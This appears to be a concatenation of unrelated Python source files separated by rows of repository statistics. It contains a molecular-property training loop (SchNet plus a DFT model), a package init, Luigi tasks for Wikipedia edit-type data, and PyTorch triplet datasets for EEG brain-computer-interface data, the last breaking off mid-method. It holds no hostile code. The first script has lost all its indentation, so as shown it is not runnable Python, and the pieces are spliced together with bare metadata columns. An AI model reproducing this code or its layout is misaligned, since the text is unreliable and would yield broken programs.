model = SchNetModel()
print(model)
model.to(device)
# print("test_dataset.mean= %s" % (alchemy_dataset.mean))
# print("test_dataset.std= %s" % (alchemy_dataset.std))
loss_fn = nn.MSELoss()
MAE_fn = nn.L1Loss()
optimizer = th.optim.Adam(
model.parameters(), lr=0.00001, weight_decay=0.000001)
scheduler = th.optim.lr_scheduler.ReduceLROnPlateau(
optimizer, mode='min', factor=0.9, patience=10, threshold=0.0000001, threshold_mode='rel', cooldown=0, min_lr=0.000001, eps=1e-08, verbose=False)
log = open(save + '/train_log.txt', 'w')
def print_res(label, res, op):
size = len(res)
for i in range(size):
line = "%s,%s\n" % (label[i][0], res[i][0])
op.writelines(line)
def eval_gcn(model, epoch, data_loader, eval_mode, log):
val_loss, val_mae = 0, 0
for jdx, batch in enumerate(data_loader):
batch.graph.to(device)
batch.label = batch.label.to(device)
batch.graph0 = batch.graph0.to(device)
batch.graph1 = batch.graph1.to(device)
batch.graph2 = batch.graph2.to(device)
batch.graph3 = batch.graph3.to(device)
batch.graph4 = batch.graph4.to(device)
batch.graph5 = batch.graph5.to(device)
batch.graph6 = batch.graph6.to(device)
batch.graph7 = batch.graph7.to(device)
batch.feature = batch.feature.to(device)
batch.dft = batch.dft.to(device)
res_dft = dft_model(batch.dft)
# new_dft = dft_model.make_features(batch.dft)
# res_dft = new_dft.mul(w_dft)
# res_dft = res_dft.sum(1)
# res_dft = res_dft.unsqueeze(1)
res_gcn = model(batch.graph, batch.graph0, batch.graph1, batch.graph2, batch.graph3,
batch.graph4, batch.graph5, batch.graph6, batch.graph7, batch.feature)
res = res_dft+res_gcn
loss = loss_fn(res, batch.label)
mae = MAE_fn(res, batch.label)
val_mae += mae.detach().item()
val_loss += loss.detach().item()
val_mae /= jdx + 1
val_loss /= jdx + 1
print(
f"Epoch {epoch} {eval_mode}_loss: {round(val_loss,4)}, {eval_mode}_mae: {round(val_mae,4)}")
log.write(
f"Epoch {epoch} {eval_mode}_loss: {round(val_loss,4)}, {eval_mode}_mae: {round(val_mae,4)}\n")
if epoch % args.saveFreq == 0:
# op_file = open('save/'+str(epoch)+'re')
res_op = open(f'{save}/{eval_mode}_res_{epoch}.csv', 'w')
# th.save(model.state_dict(), save+'/model_'+str(epoch))
for jdx, batch in enumerate(data_loader):
batch.graph.to(device)
batch.label = batch.label.to(device)
batch.graph0 = batch.graph0.to(device)
batch.graph1 = batch.graph1.to(device)
batch.graph2 = batch.graph2.to(device)
batch.graph3 = batch.graph3.to(device)
batch.graph4 = batch.graph4.to(device)
batch.graph5 = batch.graph5.to(device)
batch.graph6 = batch.graph6.to(device)
batch.graph7 = batch.graph7.to(device)
batch.feature = batch.feature.to(device)
batch.dft = batch.dft.to(device)
res_dft = dft_model(batch.dft)
# new_dft = dft_model.make_features(batch.dft)
# res_dft = new_dft.mul(w_dft)
# res_dft = res_dft.sum(1)
# res_dft = res_dft.unsqueeze(1)
res_gcn = model(batch.graph, batch.graph0, batch.graph1, batch.graph2, batch.graph3, batch.graph4, batch.graph5, batch.graph6, batch.graph7,
batch.feature)
res = res_dft+res_gcn
l = batch.label.cpu().detach().numpy()
r = res.cpu().detach().numpy()
print_res(l, r, res_op)
res_op.close()
for epoch in range(epochs):
w_loss, w_mae = 0, 0
# dft_model.eval()
model.train()
for idx, batch in enumerate(alchemy_loader):
batch.graph.to(device)
batch.label = batch.label.to(device)
batch.graph0 = batch.graph0.to(device)
batch.graph1 = batch.graph1.to(device)
batch.graph2 = batch.graph2.to(device)
batch.graph3 = batch.graph3.to(device)
batch.graph4 = batch.graph4.to(device)
batch.graph5 = batch.graph5.to(device)
batch.graph6 = batch.graph6.to(device)
batch.graph7 = batch.graph7.to(device)
batch.feature = batch.feature.to(device)
batch.dft = batch.dft.to(device)
# prediction with linear fitting
res_dft = dft_model(batch.dft)
# new_dft = dft_model.make_features(batch.dft)
# res_dft = new_dft.mul(w_dft)
# res_dft = res_dft.sum(1)
# res_dft = res_dft.unsqueeze(1)
res_gcn = model(batch.graph, batch.graph0, batch.graph1, batch.graph2, batch.graph3, batch.graph4, batch.graph5, batch.graph6, batch.graph7,
batch.feature)
res = res_dft+res_gcn
loss = loss_fn(res, batch.label)
mae = MAE_fn(res, batch.label)
optimizer.zero_grad()
loss.backward()
optimizer.step()
w_mae += mae.detach().item()
w_loss += loss.detach().item()
print(f"res_dft: {res_dft}")
print(f"res_gcn: {res_gcn}")
print(f"res: {res}")
print(f"batch_label: {batch.label}")
w_mae /= idx + 1
w_loss /= idx + 1
scheduler.step(w_mae)
print("Epoch {:2d}, loss: {:.7f}, mae: {:.7f}".format(
epoch, w_loss, w_mae))
log.write("Epoch {:2d}, loss: {:.7f}, mae: {:.7f} \n".format(
epoch, w_loss, w_mae))
model.eval()
with th.no_grad():
if epoch % args.saveFreq == 0:
res_op = open(save+'/Train_res_'+str(epoch)+'.csv', 'w')
th.save(model.state_dict(), save+'/model_'+str(epoch))
for jdx, batch in enumerate(alchemy_loader):
batch.graph.to(device)
batch.label = batch.label.to(device)
batch.graph0 = batch.graph0.to(device)
batch.graph1 = batch.graph1.to(device)
batch.graph2 = batch.graph2.to(device)
batch.graph3 = batch.graph3.to(device)
batch.graph4 = batch.graph4.to(device)
batch.graph5 = batch.graph5.to(device)
batch.graph6 = batch.graph6.to(device)
batch.graph7 = batch.graph7.to(device)
batch.feature = batch.feature.to(device)
batch.dft = batch.dft.to(device)
res_dft = dft_model(batch.dft)
# new_dft = dft_model.make_features(batch.dft)
# res_dft = new_dft.mul(w_dft)
# res_dft = res_dft.sum(1)
# res_dft = res_dft.unsqueeze(1)
res_gcn = model(batch.graph, batch.graph0, batch.graph1, batch.graph2, batch.graph3, batch.graph4, batch.graph5, batch.graph6, batch.graph7,
batch.feature)
res = res_dft+res_gcn
l = batch.label.cpu().detach().numpy()
r = res.cpu().detach().numpy()
print_res(l, r, res_op)
res_op.close()
eval_gcn(model, epoch, valid_loader, 'valid', log)
eval_gcn(model, epoch, test_loader, 'test', log)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-M",
"--model",
help="model name (nmr,bde)",
default="sch")
parser.add_argument("--epochs", help="number of epochs", default=10000)
parser.add_argument(
"--train_file", help="dataset for training", default="")
parser.add_argument(
"--valid_file", help="dataset for validation", default="")
parser.add_argument("--test_file", help="dataset for test", default="")
parser.add_argument("--save", help="save option", default="")
parser.add_argument("--device", help="device", default='cuda:0')
parser.add_argument("--saveFreq", help="save frequency",
type=int, default=10)
parser.add_argument("--dft_model", help="trained dft model to be loaded",
type=str, default='')
args = parser.parse_args()
device = th.device(args.device if th.cuda.is_available() else 'cpu')
assert args.model in ["bde", "nmr", "literature"]
# dataset_split("delaney.csv")
os.system(f'mkdir {args.save}')
if args.dft_model != '':
train_gcn(args.model, int(args.epochs), device, args)
else:
train_dft(args.model, int(args.epochs), device, args)
| 40.021033
| 160
| 0.573742
| 2,602
| 20,931
| 4.436972
| 0.08186
| 0.068601
| 0.099091
| 0.019749
| 0.858987
| 0.855002
| 0.837765
| 0.822867
| 0.816631
| 0.797748
| 0
| 0.023933
| 0.301323
| 20,931
| 522
| 161
| 40.097701
| 0.765522
| 0.124457
| 0
| 0.770408
| 0
| 0.010204
| 0.068215
| 0.003726
| 0
| 0
| 0
| 0
| 0.002551
| 1
| 0.015306
| false
| 0
| 0.043367
| 0
| 0.058673
| 0.048469
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cfc8484c75647deac6ed655b231b902342024638
| 68
|
py
|
Python
|
application/__init__.py
|
srcc-msu/job_statistics
|
74680a4e4c105ebcff94f089e07fcb44dbcc12d9
|
[
"MIT"
] | null | null | null |
application/__init__.py
|
srcc-msu/job_statistics
|
74680a4e4c105ebcff94f089e07fcb44dbcc12d9
|
[
"MIT"
] | null | null | null |
application/__init__.py
|
srcc-msu/job_statistics
|
74680a4e4c105ebcff94f089e07fcb44dbcc12d9
|
[
"MIT"
] | null | null | null |
from application import controllers
from application import helpers
| 22.666667
| 35
| 0.882353
| 8
| 68
| 7.5
| 0.625
| 0.5
| 0.7
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 68
| 2
| 36
| 34
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
cfe289092694be89227ca3a014658ff30dd67b71
| 1,636
|
py
|
Python
|
tasks/collectors/edit_type.py
|
ayarov/SubjectMatterExpertise
|
d7e5cbfa42c2bc92bf528e213d361c209e741f1b
|
[
"MIT"
] | null | null | null |
tasks/collectors/edit_type.py
|
ayarov/SubjectMatterExpertise
|
d7e5cbfa42c2bc92bf528e213d361c209e741f1b
|
[
"MIT"
] | null | null | null |
tasks/collectors/edit_type.py
|
ayarov/SubjectMatterExpertise
|
d7e5cbfa42c2bc92bf528e213d361c209e741f1b
|
[
"MIT"
] | null | null | null |
import os
import luigi
import pandas as pd
class CollectEditTypes(luigi.Task):
file_name = 'revisions_with_edit_types.h5'
data_dir = luigi.Parameter(default=r'../../data/sme')
def output(self):
return luigi.LocalTarget(path=os.path.join(self.data_dir, self.file_name))
def run(self):
df = pd.read_csv(os.path.join(self.data_dir, 'revisions_with_edit_types_final.csv'))
if isinstance(df, pd.DataFrame):
df.drop_duplicates(inplace=True)
df.to_hdf(os.path.join(self.data_dir, self.file_name), key='df', mode='w')
class CollectEditTypes2012(luigi.Task):
file_name = 'edit_types_2012.h5'
data_dir = luigi.Parameter(default=r'D:\data\sme')
def output(self):
return luigi.LocalTarget(path=os.path.join(self.data_dir, self.file_name))
def run(self):
df = pd.read_hdf(os.path.join(self.data_dir, 'edit_types.h5'), key='df_2012', mode='r')
if isinstance(df, pd.DataFrame):
df.drop_duplicates(inplace=True)
df.to_hdf(os.path.join(self.data_dir, self.file_name), key='df', mode='w')
class CollectEditTypes2018(luigi.Task):
file_name = 'edit_types_2018.h5'
data_dir = luigi.Parameter(default=r'D:\data\sme')
def output(self):
return luigi.LocalTarget(path=os.path.join(self.data_dir, self.file_name))
def run(self):
df = pd.read_hdf(os.path.join(self.data_dir, 'edit_types.h5'), key='df_2018', mode='r')
if isinstance(df, pd.DataFrame):
df.drop_duplicates(inplace=True)
df.to_hdf(os.path.join(self.data_dir, self.file_name), key='df', mode='w')
| 35.565217
| 95
| 0.668704
| 252
| 1,636
| 4.162698
| 0.202381
| 0.080076
| 0.085796
| 0.120114
| 0.824595
| 0.824595
| 0.755005
| 0.725453
| 0.725453
| 0.725453
| 0
| 0.021658
| 0.18154
| 1,636
| 45
| 96
| 36.355556
| 0.761763
| 0
| 0
| 0.606061
| 0
| 0
| 0.113692
| 0.038509
| 0
| 0
| 0
| 0
| 0
| 1
| 0.181818
| false
| 0
| 0.090909
| 0.090909
| 0.636364
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
3225484cd17bf99da7f4facd40d8866b54764175
| 46,948
|
py
|
Python
|
PR_BCI_team/Team_StarLab/DKHan/examples/CSDG/datasets.py
|
PatternRecognition/OpenBMI
|
d9291ddb81f4319fb3764d7192e0363939a62ee9
|
[
"MIT"
] | 217
|
2015-11-02T11:10:29.000Z
|
2022-03-22T07:01:12.000Z
|
PR_BCI_team/Team_StarLab/DKHan/examples/CSDG/datasets.py
|
deep-bci-g/OpenBMI
|
75daf901b2dbe215852cbff243606dcfcd10f05c
|
[
"MIT"
] | 24
|
2015-11-02T11:10:45.000Z
|
2021-09-08T11:10:33.000Z
|
PR_BCI_team/Team_StarLab/DKHan/examples/CSDG/datasets.py
|
deep-bci-g/OpenBMI
|
75daf901b2dbe215852cbff243606dcfcd10f05c
|
[
"MIT"
] | 112
|
2016-01-22T01:45:44.000Z
|
2022-03-22T07:08:19.000Z
|
from __future__ import print_function
import argparse
import torch
import torch.backends.cudnn as cudnn
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torchvision import datasets, transforms
from torch.utils.data import Dataset, DataLoader
from torch.utils.data.sampler import SubsetRandomSampler
import numpy as np
import pickle
def windows(data, size, step):
start = 0
while ((start+size) < data.shape[0]):
yield int(start), int(start + size)
start += step
def segment_signal_without_transition(data, window_size, step):
segments = []
for (start, end) in windows(data, window_size, step):
if(len(data[start:end]) == window_size):
segments = segments + [data[start:end]]
return np.array(segments)
def segment_dataset(X, window_size, step):
win_x = []
for i in range(X.shape[0]):
win_x = win_x + [segment_signal_without_transition(X[i], window_size, step)]
win_x = np.array(win_x)
return win_x
class TripletGiga(Dataset):
def __init__(self,x,y, valtype, transform=None,istrain = True, sess=1,subj=None, trial=None):
self.transform = transform
self.istrain = istrain
if trial is None:
if istrain:
self.trial = 0,200
else:
self.trial = 100,200 #online
else:
self.trial = trial
x_data = x.copy()
y_data = y.copy()
self.in_chans = x_data.shape[2]
self.input_time_length = x_data.shape[3]
x_data = x_data.reshape(108,-1,1,self.in_chans,self.input_time_length)
y_data = y_data.reshape(108,-1)
if valtype == 'sess':
if istrain:
x_data = x_data[np.s_[0:54], self.trial[0]:self.trial[1], :, :, :]
y_data = y_data[np.s_[0:54], self.trial[0]:self.trial[1]]
else:
x_data = x_data[np.s_[0 + 54:54 + 54], self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
y_data = y_data[np.s_[0 + 54:54 + 54], self.trial[0]:self.trial[1]]
elif valtype == 'loso':
if subj is None:
raise AssertionError()
if istrain:
x_data = np.delete(x_data, np.s_[subj, subj + 54], 0) # leave one subj
y_data = np.delete(y_data, np.s_[subj, subj + 54], 0)
else:
x_data = x_data[np.s_[subj + 54], self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
y_data = y_data[np.s_[subj + 54], self.trial[0]:self.trial[1]]
elif valtype == 'subj':
if subj is None:
raise AssertionError()
if istrain:
x_data = x_data[subj, self.trial[0]:self.trial[1], :, :, :]
y_data = y_data[subj, self.trial[0]:self.trial[1]]
else:
x_data = x_data[subj, self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
y_data = y_data[subj, self.trial[0]:self.trial[1]]
else:
raise AssertionError()
self.x_data = x_data.reshape(-1, 1, self.in_chans,self.input_time_length)
self.y_data = y_data.reshape(-1)
self.len = self.y_data.shape[0]
self.labels_set = set(self.y_data)
self.label_to_indices = {label: np.where(self.y_data == label)[0]
for label in self.labels_set}
random_state = np.random.RandomState(0)
if not istrain:
self.labels_set = set(self.y_data)
self.label_to_indices = {label: np.where(self.y_data == label)[0]
for label in self.labels_set}
triplets = [[i,
random_state.choice(self.label_to_indices[self.y_data[i].item()]),
random_state.choice(self.label_to_indices[
np.random.choice(
list(self.labels_set - set([self.y_data[i].item()]))
)
])
]
for i in range(len(self.x_data))]
self.test_triplets = triplets
def __getitem__(self, index):
if self.istrain:
img1 = self.x_data[index,:,:,:]
y1 = self.y_data[index]
positive_index = index
while positive_index == index:
positive_index = np.random.choice(self.label_to_indices[y1])
negative_label = np.random.choice(list(self.labels_set - set([y1])))
negative_index = np.random.choice(self.label_to_indices[negative_label])
img2 = self.x_data[positive_index,:,:,:]
img3 = self.x_data[negative_index,:,:,:]
y2 = self.y_data[positive_index]
y3 = self.y_data[negative_index]
else:
img1 = self.x_data[self.test_triplets[index][0],:,:,:]
img2 = self.x_data[self.test_triplets[index][1],:,:,:]
img3 = self.x_data[self.test_triplets[index][2],:,:,:]
y1 = self.y_data[self.test_triplets[index][0]]
y2 = self.y_data[self.test_triplets[index][1]]
y3 = self.y_data[self.test_triplets[index][2]]
img1 = torch.from_numpy(img1).type(torch.FloatTensor)
img2 = torch.from_numpy(img2).type(torch.FloatTensor)
img3 = torch.from_numpy(img3).type(torch.FloatTensor)
if self.transform is not None:
img1 = self.transform(img1)
img2 = self.transform(img2)
img3 = self.transform(img3)
return (img1, img2, img3), (y1,y2,y3)
def __len__(self):
return self.len
class TripletBCIC(Dataset):
def __init__(self,x,y, valtype, transform=None,istrain = True, sess=1,subj=None, trial=None):
self.transform = transform
self.istrain = istrain
if trial is None:
if istrain:
self.trial = 0,200
else:
self.trial = 100,200 #online
else:
self.trial = trial
x_data = x.copy()
y_data = y.copy()
self.in_chans = x_data.shape[2]
self.input_time_length = x_data.shape[3]
x_data = x_data.reshape(9,-1,1,self.in_chans,self.input_time_length)
y_data = y_data.reshape(9,-1)
if valtype == 'sess':
if istrain:
x_data = x_data[np.s_[0:54], self.trial[0]:self.trial[1], :, :, :]
y_data = y_data[np.s_[0:54], self.trial[0]:self.trial[1]]
else:
x_data = x_data[np.s_[0 + 54:54 + 54], self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
y_data = y_data[np.s_[0 + 54:54 + 54], self.trial[0]:self.trial[1]]
elif valtype == 'loso':
if subj is None:
raise AssertionError()
if istrain:
x_data = np.delete(x_data, np.s_[subj, subj + 54], 0) # leave one subj
y_data = np.delete(y_data, np.s_[subj, subj + 54], 0)
else:
x_data = x_data[np.s_[subj + 54], self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
y_data = y_data[np.s_[subj + 54], self.trial[0]:self.trial[1]]
elif valtype == 'subj':
if subj is None:
raise AssertionError()
if istrain:
x_data = x_data[subj, self.trial[0]:self.trial[1], :, :, :]
y_data = y_data[subj, self.trial[0]:self.trial[1]]
else:
x_data = x_data[subj, self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
y_data = y_data[subj, self.trial[0]:self.trial[1]]
else:
raise AssertionError()
self.x_data = x_data.reshape(-1, 1, self.in_chans,self.input_time_length)
self.y_data = y_data.reshape(-1)
self.len = self.y_data.shape[0]
self.labels_set = set(self.y_data)
self.label_to_indices = {label: np.where(self.y_data == label)[0]
for label in self.labels_set}
random_state = np.random.RandomState(0)
if not istrain:
self.labels_set = set(self.y_data)
self.label_to_indices = {label: np.where(self.y_data == label)[0]
for label in self.labels_set}
triplets = [[i,
random_state.choice(self.label_to_indices[self.y_data[i].item()]),
random_state.choice(self.label_to_indices[
np.random.choice(
list(self.labels_set - set([self.y_data[i].item()]))
)
])
]
for i in range(len(self.x_data))]
self.test_triplets = triplets
def __getitem__(self, index):
if self.istrain:
img1 = self.x_data[index,:,:,:]
y1 = self.y_data[index]
positive_index = index
while positive_index == index:
positive_index = np.random.choice(self.label_to_indices[y1])
negative_label = np.random.choice(list(self.labels_set - set([y1])))
negative_index = np.random.choice(self.label_to_indices[negative_label])
img2 = self.x_data[positive_index,:,:,:]
img3 = self.x_data[negative_index,:,:,:]
y2 = self.y_data[positive_index]
y3 = self.y_data[negative_index]
else:
img1 = self.x_data[self.test_triplets[index][0],:,:,:]
img2 = self.x_data[self.test_triplets[index][1],:,:,:]
img3 = self.x_data[self.test_triplets[index][2],:,:,:]
y1 = self.y_data[self.test_triplets[index][0]]
y2 = self.y_data[self.test_triplets[index][1]]
y3 = self.y_data[self.test_triplets[index][2]]
img1 = torch.from_numpy(img1).type(torch.FloatTensor)
img2 = torch.from_numpy(img2).type(torch.FloatTensor)
img3 = torch.from_numpy(img3).type(torch.FloatTensor)
if self.transform is not None:
img1 = self.transform(img1)
img2 = self.transform(img2)
img3 = self.transform(img3)
return (img1, img2, img3), (y1,y2,y3)
def __len__(self):
return self.len
class TripletGiga2(Dataset):
def __init__(self,x,y, valtype, transform=None,istrain = True, sess=1,subj=None, trial=None):
self.transform = transform
self.istrain = istrain
if trial is None:
if istrain:
self.trial = 0,200
else:
self.trial = 100,200 #online
else:
self.trial = trial
x_data = x.copy()
y_data = y.copy()
self.in_chans = x_data.shape[2]
self.input_time_length = x_data.shape[3]
x_data = x_data.reshape(108, -1, 1, self.in_chans, self.input_time_length)
y_data = y_data.reshape(108,-1)
if valtype == 'sess':
if istrain:
x_data = x_data[np.s_[0:54], self.trial[0]:self.trial[1], :, :, :]
y_data = y_data[np.s_[0:54], self.trial[0]:self.trial[1]]
else:
x_data = x_data[np.s_[0 + 54:54 + 54], self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
y_data = y_data[np.s_[0 + 54:54 + 54], self.trial[0]:self.trial[1]]
elif valtype == 'loso':
if subj is None:
raise AssertionError()
if istrain:
x_data = np.delete(x_data, np.s_[subj, subj + 54], 0) # leave one subj
y_data = np.delete(y_data, np.s_[subj, subj + 54], 0)
else:
x_data = x_data[np.s_[subj + 54], self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
y_data = y_data[np.s_[subj + 54], self.trial[0]:self.trial[1]]
elif valtype == 'subj':
if subj is None:
raise AssertionError()
if istrain:
x_data = x_data[subj, self.trial[0]:self.trial[1], :, :, :]
y_data = y_data[subj, self.trial[0]:self.trial[1]]
else:
x_data = x_data[subj, self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
y_data = y_data[subj, self.trial[0]:self.trial[1]]
else:
raise AssertionError()
self.x_data = x_data.reshape(-1, 1, self.in_chans, self.input_time_length)
self.y_data = y_data.reshape(-1)
self.y_subj = (y_data.reshape(-1)-self.y_data%2)/2
self.len = self.y_data.shape[0]
self.labels_set = np.unique(self.y_data)
self.label_to_indices = {label: np.where(self.y_data == label)[0]
for label in self.labels_set}
random_state = np.random.RandomState(0)
if not istrain:
self.labels_set = np.unique(self.y_data)
self.label_to_indices = {label: np.where(self.y_data == label)[0]
for label in self.labels_set}
triplets = [[i,
random_state.choice(self.label_to_indices[ # same task, diff subj
np.random.choice(
self.labels_set[np.where(
(self.labels_set % 2 == self.y_data[i] % 2) & (
(self.labels_set - self.labels_set % 2) / 2 !=
self.y_subj[i]), True, False)]
)
]),
random_state.choice(self.label_to_indices[#diff task, diff subj
np.random.choice(
self.labels_set[np.where((self.labels_set%2!=self.y_data[i]%2) & ((self.labels_set-self.labels_set%2)/2 != self.y_subj[i]), True,False)]
)
])
]
for i in range(self.len)]
self.test_triplets = triplets
def __getitem__(self, index):
if self.istrain:
img1 = self.x_data[index,:,:,:]
y1 = self.y_data[index]
positive_index = index
while positive_index == index:
positive_index = np.random.choice(self.label_to_indices[np.random.choice(
self.labels_set[np.where(
(self.labels_set % 2 == y1 % 2) & (
(self.labels_set - self.labels_set % 2) / 2 !=
(y1-y1%2)/2), True, False)]
)])
negative_label = np.random.choice(self.labels_set[np.where((self.labels_set%2!=y1%2) & ((self.labels_set-self.labels_set%2)/2 != (y1-y1%2)/2), True,False)])
# negative_label = np.random.choice(self.labels_set[np.where((self.labels_set%2!=y1%2) & ((self.labels_set-self.labels_set%2)/2 != (y1-y1%2)/2), True,False)]) #diffsub
negative_index = np.random.choice(self.label_to_indices[negative_label])
img2 = self.x_data[positive_index,:,:,:]
img3 = self.x_data[negative_index,:,:,:]
y2 = self.y_data[positive_index]
y3 = self.y_data[negative_index]
else:
img1 = self.x_data[self.test_triplets[index][0],:,:,:]
img2 = self.x_data[self.test_triplets[index][1],:,:,:]
img3 = self.x_data[self.test_triplets[index][2],:,:,:]
y1 = self.y_data[self.test_triplets[index][0]]
y2 = self.y_data[self.test_triplets[index][1]]
y3 = self.y_data[self.test_triplets[index][2]]
img1 = torch.from_numpy(img1).type(torch.FloatTensor)
img2 = torch.from_numpy(img2).type(torch.FloatTensor)
img3 = torch.from_numpy(img3).type(torch.FloatTensor)
if self.transform is not None:
img1 = self.transform(img1)
img2 = self.transform(img2)
img3 = self.transform(img3)
return (img1, img2, img3), (y1%2,y2%2,y3%2)
def __len__(self):
return self.len
class TripletGigaDA(Dataset):
def __init__(self,x,y, valtype, transform=None,istrain = True, sess=1,subj_s=None, trial_s=None, subj_t=None, trial_t=None):
self.transform = transform
self.istrain = istrain
x_data = x.copy()
y_data = y.copy()
self.in_chans = x_data.shape[2]
self.input_time_length = x_data.shape[3]
x_data = x_data.reshape(108, -1, 1, self.in_chans, self.input_time_length)
y_data = y_data.reshape(108, -1)
# source
self.trial_s = trial_s
if valtype == 'subj':
if subj_s is None:
raise AssertionError()
x_data_s = x_data[subj_s, self.trial_s[0]:self.trial_s[1], :, :, :]
y_data_s = y_data[subj_s, self.trial_s[0]:self.trial_s[1]]
else:
raise AssertionError()
self.x_data_s = x_data_s.reshape(-1, 1, self.in_chans, self.input_time_length)
self.y_data_s = y_data_s.reshape(-1)
# self.y_subj = (y_data.reshape(-1)-self.y_data%2)/2
#target
self.trial_t = trial_t
if valtype == 'subj':
if subj_t is None:
raise AssertionError()
x_data_t = x_data[subj_t, self.trial_t[0]:self.trial_t[1], :, :, :]
y_data_t = y_data[subj_t, self.trial_t[0]:self.trial_t[1]]
else:
raise AssertionError()
self.x_data_t = x_data_t.reshape(-1, 1, self.in_chans, self.input_time_length)
self.y_data_t = y_data_t.reshape(-1)
self.len = self.y_data_t.shape[0]
self.labels_set = np.unique(self.y_data_s)
self.label_to_indices = {label: np.where(self.y_data_s == label)[0]
for label in self.labels_set}
random_state = np.random.RandomState(0)
def __getitem__(self, index):
img1 = self.x_data_t[index,:,:,100:500]
y1 = self.y_data_t[index]
positive_index = index
while positive_index == index:
positive_index = np.random.choice(self.label_to_indices[np.random.choice(
self.labels_set[np.where(
(self.labels_set % 2 == y1 % 2) & (
(self.labels_set - self.labels_set % 2) / 2 !=
(y1-y1%2)/2), True, False)]
)])
negative_label = np.random.choice(self.labels_set[np.where((self.labels_set%2!=y1%2) & ((self.labels_set-self.labels_set%2)/2 != (y1-y1%2)/2), True,False)])
# negative_label = np.random.choice(self.labels_set[np.where((self.labels_set%2!=y1%2) & ((self.labels_set-self.labels_set%2)/2 != (y1-y1%2)/2), True,False)]) #diffsub
negative_index = np.random.choice(self.label_to_indices[negative_label])
img2 = self.x_data_s[positive_index,:,:,100:500]
img3 = self.x_data_s[negative_index,:,:,100:500]
y2 = self.y_data_s[positive_index]
y3 = self.y_data_s[negative_index]
img1 = torch.from_numpy(img1).type(torch.FloatTensor)
img2 = torch.from_numpy(img2).type(torch.FloatTensor)
img3 = torch.from_numpy(img3).type(torch.FloatTensor)
if self.transform is not None:
img1 = self.transform(img1)
img2 = self.transform(img2)
img3 = self.transform(img3)
return (img1, img2, img3), (y1%2,y2%2,y3%2)
def __len__(self):
return self.len
class TripletGiga3(Dataset):
def __init__(self,x,y, valtype, transform=None,istrain = True, sess=1,subj=None, trial=None):
self.transform = transform
self.istrain = istrain
if trial is None:
if istrain:
self.trial = 0,200
else:
self.trial = 100,200 #online
else:
self.trial = trial
x_data = x.copy()
y_data = y.copy()
self.in_chans = x_data.shape[2]
self.input_time_length = x_data.shape[3]
x_data = x_data.reshape(108, -1, 1, self.in_chans, self.input_time_length)
y_data = y_data.reshape(108,-1)
if valtype == 'sess':
if istrain:
x_data = x_data[np.s_[0:54], self.trial[0]:self.trial[1], :, :, :]
y_data = y_data[np.s_[0:54], self.trial[0]:self.trial[1]]
else:
x_data = x_data[np.s_[0 + 54:54 + 54], self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
y_data = y_data[np.s_[0 + 54:54 + 54], self.trial[0]:self.trial[1]]
elif valtype == 'loso':
if subj is None:
raise AssertionError()
if istrain:
x_data = np.delete(x_data, np.s_[subj, subj + 54], 0) # leave one subj
y_data = np.delete(y_data, np.s_[subj, subj + 54], 0)
else:
x_data = x_data[np.s_[subj + 54], self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
y_data = y_data[np.s_[subj + 54], self.trial[0]:self.trial[1]]
elif valtype == 'subj':
if subj is None:
raise AssertionError()
if istrain:
x_data = x_data[subj, self.trial[0]:self.trial[1], :, :, :]
y_data = y_data[subj, self.trial[0]:self.trial[1]]
else:
x_data = x_data[subj, self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
y_data = y_data[subj, self.trial[0]:self.trial[1]]
else:
raise AssertionError()
self.x_data = x_data.reshape(-1, 1, self.in_chans, self.input_time_length)
self.y_data = y_data.reshape(-1)
self.y_subj = (y_data.reshape(-1)-self.y_data%2)/2
self.len = self.y_data.shape[0]
# self.labels_set = np.unique(self.y_data)
# self.label_to_indices = {label: np.where(self.y_data == label)[0]
# for label in self.labels_set}
self.input_labels_set = np.unique(y_data)
bci_excellent = np.r_[43,20,27,1,28,32,35,44,36,2]
bci_excellent = np.concatenate([bci_excellent,bci_excellent+54])
bci_excellent = np.concatenate([bci_excellent*2,bci_excellent*2+1])
self.labels_set = np.unique(bci_excellent)
self.labels_set = np.intersect1d(self.labels_set,self.input_labels_set)
self.label_to_indices = {label: np.where(self.y_data == label)[0]
for label in self.labels_set}
random_state = np.random.RandomState(0)
if not istrain:
triplets = [[i,
random_state.choice(self.label_to_indices[ # same task, diff subj
np.random.choice(
self.labels_set[np.where(
(self.labels_set % 2 == self.y_data[i] % 2) & (
(self.labels_set - self.labels_set % 2) / 2 !=
self.y_subj[i]), True, False)]
)
]),
random_state.choice(self.label_to_indices[#diff task, diff subj
np.random.choice(
self.labels_set[np.where((self.labels_set%2!=self.y_data[i]%2) & ((self.labels_set-self.labels_set%2)/2 != self.y_subj[i]), True,False)]
)
])
]
for i in range(self.len)]
self.test_triplets = triplets
def __getitem__(self, index):
if self.istrain:
